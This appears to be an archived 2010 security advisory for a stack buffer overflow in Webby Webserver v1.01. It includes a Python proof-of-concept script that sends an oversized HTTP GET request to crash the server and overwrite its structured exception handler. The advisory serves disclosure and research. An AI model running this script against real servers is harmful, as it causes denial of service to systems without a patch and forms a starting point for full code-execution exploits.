AOH :: HP Unsorted W :: B1A-1116.HTM

Webby Webserver v1.01 - Buffer overflow with overwritten structured exception handler (SEH)



Webby Webserver v1.01 - Buffer overflow vulnerability with overwritten structured exception handler (SEH)
Webby Webserver v1.01 - Buffer overflow vulnerability with overwritten structured exception handler (SEH)



---------------------------------------------=0D
=0D
Webby Webserver v1.01=0D
- Buffer overflow vulnerability with overwritten structured exception handler (SEH)=0D
Date: 25.05.2010=0D
=0D
---------------------------------------------=0D
=0D
- Description=0D
=0D
Webby is a small webserver for the windows operating system.=0D
=0D
- buffer overflow vulnerability=0D
=0D
The vulnerability can be triggered by sending a specially crafted HTTP GET request. Payload of the attached POC overwrites the SEH with NOPs.=0D
=0D
- Solution=0D
=0D
No known solution available.=0D
No contact details of the author found.=0D
=0D
- Credits=0D
=0D
The vulnerability was discovered by Michael Messner from Integralis=0D
michael#dot#messner#at#integralis#dot#com=0D
=0D
- Timeline=0D
=0D
25.05.2010 - Vulnerability discovered=0D
=0D
- Reference=0D
=0D
Download vulnerable software=0D
http://www.shareware.de/webby-webserver/=0D 
=0D
- POC=0D
=0D
#!/usr/bin/python=0D
=0D
import socket=0D
import sys=0D
import os.path=0D
import time=0D
=0D
if len(sys.argv) < 2:=0D
	print "Usage: webby.py  "=0D
	sys.exit(0)=0D
=0D
ips = sys.argv[1]=0D
port = int(sys.argv[2])=0D
=0D
string = "A"*790=0D
string += "\x90"*4	=0D
string += "\x42"*105		=0D
=0D
method = "GET"=0D
print "starting POC for:", ips=0D
print ""=0D
=0D
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)=0D
try:=0D
	connect=s.connect((ips, port))=0D
except:=0D
	print "no connection possible"=0D
	sys.exit(1)=0D
=0D
payload = method + ' http://'+ ips + '/' + string + ' HTTP/1.0\x0d\x0a\x0d\x0a'=0D 
=0D
print "\r\nsending payload"=0D
print "\n\rusing methode %s with buffersize of: %s" % (method,str(len(string)))=0D
print "..."=0D
=0D
print payload=0D
s.send(payload)=0D
print "finished with method %s and payload %s" % (method,payload)=0D
print "... check SEH"=0D

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.